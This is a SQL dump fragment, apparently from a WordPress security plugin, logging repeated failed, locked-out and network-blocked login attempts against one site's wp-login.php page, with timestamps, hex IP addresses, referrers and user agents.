(4719, 1594740950.722726, 1594740950.640900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4720, 0.000000, 1594741442.409679, 0x00000000000000000000ffffd06d368b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4721, 0.000000, 1594742216.562332, 0x00000000000000000000ffff2241f717, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.laurabethezzellvoiceover.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4722, 1594743896.206083, 1594743896.083200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4723, 1594742480.656579, 1594742480.587800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4724, 1594745314.695758, 1594745314.605700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4725, 0.000000, 1594745977.479102, 0x00000000000000000000ffff9f59edeb, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4726, 1594746796.436015, 1594746796.355200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4727, 0.000000, 1594748096.689257, 0x00000000000000000000ffffa17537b0, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4728, 1594748623.421407, 1594748623.366400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4729, 1594750542.874005, 1594750542.804700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4730, 0.000000, 1594752168.312256, 0x00000000000000000000ffff68ee7d85, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4731, 1594752386.294747, 1594752386.246400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4732, 1594754159.293734, 1594754159.198400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4733, 0.000000, 1594754176.455059, 0x00000000000000000000ffff2241fea7, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://modsartesanales.es/blog/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4734, 0.000000, 1594754501.261049, 0x00000000000000000000ffff70c448bc, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4735, 0.000000, 1594754989.543672, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4736, 1594755738.188778, 1594755738.087400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4737, 1594758837.896204, 1594758837.775900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4738, 1594757284.491293, 1594757284.411500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4739, 0.000000, 1594759305.809298, 0x00000000000000000000ffffcf9aec61, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4740, 0.000000, 1594759786.906043, 0x00000000000000000000ffff2e65a873, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4741, 1594762101.025891, 1594762100.917400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4742, 1594760489.293941, 1594760489.241800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4743, 1594765389.899202, 1594765389.723700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4744, 1594763754.438767, 1594763754.349700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4745, 0.000000, 1594766082.241879, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://pinekon.ee/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4746, 0.000000, 1594766965.028424, 0x00000000000000000000ffff74cef751, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4747, 1594767144.610820, 1594767144.568000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4748, 0.000000, 1594768009.787837, 0x00000000000000000000ffff23efbe85, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4749, 1594768929.310605, 1594768929.261000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4750, 0.000000, 1594770730.007240, 0x00000000000000000000ffff1f843a33, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4751, 1594770814.233808, 1594770814.189600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4752, 0.000000, 1594771286.642678, 0x00000000000000000000ffffd9b68c75, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4753, 1594772568.900624, 1594772568.807000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4754, 0.000000, 1594773050.453273, 0x00000000000000000000ffff2241f717, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.ferienwohnung-waxenstein.de/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4755, 0.000000, 1594774172.837861, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4756, 1594774289.328709, 1594774289.257500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4757, 0.000000, 1594774776.105691, 0x00000000000000000000ffffb60170e5, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4758, 1594775961.983413, 1594775961.912800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4759, 1594777679.206967, 1594777679.163800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4760, 0.000000, 1594778074.389400, 0x00000000000000000000ffff68f816fa, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4761, 0.000000, 1594779082.358668, 0x00000000000000000000ffff90d953e1, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4762, 1594779449.496792, 1594779449.427300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4763, 0.000000, 1594780182.538496, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4764, 1594781028.599654, 1594781028.543000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4765, 0.000000, 1594781896.952326, 0x00000000000000000000ffff8a443435, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4766, 1594782694.222462, 1594782694.163200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4767, 1594784380.577819, 1594784380.489200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4768, 0.000000, 1594785846.207428, 0x00000000000000000000ffff17fb82d6, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://fullsex.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4769, 0.000000, 1594785909.757916, 0x00000000000000000000ffffa5e36f27, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4770, 1594786016.623045, 1594786016.520000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4771, 0.000000, 1594787517.622958, 0x00000000000000000000ffff44b749fe, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4772, 1594787570.961105, 1594787570.918800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4773, 0.000000, 1594787912.703876, 0x00000000000000000000ffff1f843a33, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4774, 1594789175.762987, 1594789175.705800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4775, 0.000000, 1594789673.290146, 0x00000000000000000000ffff9f593294, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4776, 1594790988.621356, 1594790988.579000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4777, 0.000000, 1594791083.795911, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4778, 1594792620.318906, 1594792620.191300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4779, 0.000000, 1594793956.426815, 0x00000000000000000000ffff5b86f8e6, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4780, 1594794248.717997, 1594794248.608100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4781, 0.000000, 1594794470.665462, 0x00000000000000000000ffff17fb82d6, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://rumathphysics.org/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4782, 1594796052.131508, 1594796051.972600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
